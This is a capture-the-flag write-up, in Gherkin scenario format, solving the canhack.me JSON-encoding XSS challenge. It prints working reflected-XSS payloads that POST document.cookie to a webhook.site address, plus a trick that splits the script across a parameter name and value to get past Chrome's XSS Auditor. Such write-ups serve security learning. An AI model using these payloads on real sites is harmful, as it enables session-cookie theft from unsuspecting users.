## Version 2.0
## language: en

Feature: json-canhackme
  Site:
    canhack.me
  User:
    ununicornio
  Goal:
    Get the tester system's cookie

  Background:
  Hacker's software:
    | <Software name>       | <Version>       |
    | Kali Linux            | 2017.3          |
    | Firefox Quantum       | 64.0b14         |
    | Google Chrome         | 70.0.3538.110   |

  Scenario: Fail:xss-in-param-value
    Given I go to the challenge page
    And it prompts
    """
    This service provides JSON encoding.
    https://json.canhack.me/

    If you find a vulnerability, capture the flag via the URL below.
    https://json.canhack.me/tester
    """
    And I go to the JSON encoding Service in firefox
    And find this url
    """
    https://json.canhack.me/?foo=123&bar=456
    """
    And this plain JSON output rendered
    """
    {"foo": "123", "bar": "456"}
    """
    Then I deduce it will render whatever data is passed as params in the URL
    Then i go to the tester URL
    And find some useful information about how the challenge has to be solved
    """
    If you enter the URL of this challenge,
    I will set the flag in the cookie and visit the URL you entered
    via Google Chrome 68.0.3440.75.
    """
    Then I think a reflected XSS attack will work for this
    Then I go to the challenge page and set the url to
    """
    https://json.canhack.me/?foo=123&bar=<script>alert("xss")</script>
    """
    But nothing happens, I just get this response
    """
    {"foo": "123", "bar": ""}
    """
    Then I view the response page source code
    And find out double quotes are being escaped
    """
    {"foo": "123", "bar": "<script>alert(\"xss\")</script>"}
    """
    Then I try with single quotes
    """
    https://json.canhack.me/?foo=123&bar=<script>alert('xss')</script>
    """
    And get the expected alert. Pwnd! ...or so I thought [evidence](alert.png)
    Then I build a new URL with a payload that sends me the client's cookies
    """
    https://json.canhack.me/?foo=<script>const Http = new XMLHttpRequest();
    Http.open('POST',
    'https://webhook.site/235c0013-a97f-4266-9149-6bbe909db17b');
    Http.send(document.cookie);</script>
    """
    And go to it in my browser
    Then go to the webhook tester
    """
    https://webhook.site/#/235c0013-a97f-4266-9149-6bbe909db17b/
    df806f4e-4bf7-4f83-82b3-060e00db15e7/1
    """
    And see a new request with a cookie [evidence](request.png)
    """
    flag=tester_will_set_the_flag_in_here
    """
    Then I go to the challenge tester and give it the URL I just made
    And get a success message
    """
    Success! Please wait while visiting the URL you entered.
    """
    Then go to the webhook tester expecting to find a new request with the flag
    But there's nothing new
    Then I go to the challenge tester to try again, wondering what went wrong
    Then I notice it uses Chrome 68 to visit the URL, while I'm using Firefox
    Then I open chrome and try the alert payload
    And it gets blocked by the Chrome XSS Auditor
    """
    This page isn’t working Chrome detected unusual code on this page and
    blocked it to protect your personal information (for example, passwords,
    phone numbers, and credit cards).
    Try visiting the site's homepage.
    ERR_BLOCKED_BY_XSS_AUDITOR
    """
    Then I conclude I'll have to find a way to bypass the auditor.

  Scenario: Fail:bypassing-the-auditor
    Given I know I need to run an XSS attack that bypasses the Chrome Auditor
    Then I do dome research
    And try several filter evasion techniques
    But nothing works, the auditor is way too good

  Scenario: Success:multiple-parameters
    Given I know I need to run an XSS attack that bypasses the Chrome Auditor
    And know the auditor detects most known evasion techniques
    Then I do some more research about the auditor itself
    And find out it mainly looks for payloads sent in a single parameter
    And I can pass whatever many parameters I want in the challenge
    Then I need to find a way to split my payload between several parameters
    Then I analyze how the output is built in the challenge
    """
    https://json.canhack.me/?{variable1}={value1}&{variable2}={value2}

    returns

    {"{variable1}": "{value1}", "{variable2}": "{value2}"}
    """
    And I notice I can not only pass whatever values I want
    But I can also name the variables however I want
    Then maybe i don't need to split the script between several parameters
    But just between a variable name and its value
    Then I try
    """
    https://json.canhack.me/?<script>alert(=)</script>
    """
    And sure enough, I get an alert! [evidence](alertchrome.png)
    Then I build a new payload and try it on chrome
    """
    https://json.canhack.me/?<script>console.log(=);
    const Http = new XMLHttpRequest();
    Http.open('POST',
    'https://webhook.site/235c0013-a97f-4266-9149-6bbe909db17b');
    Http.send(document.cookie)</script>
    """
    Then I go to the webhook tester and, sure enough, there's a new request
    Then I give the challenge tester my new payload
    And it sends me a request with the flag in the cookie [evidence](pwnd.png)
    Then I input the flag in the challenge site
    Then I pass the challenge.
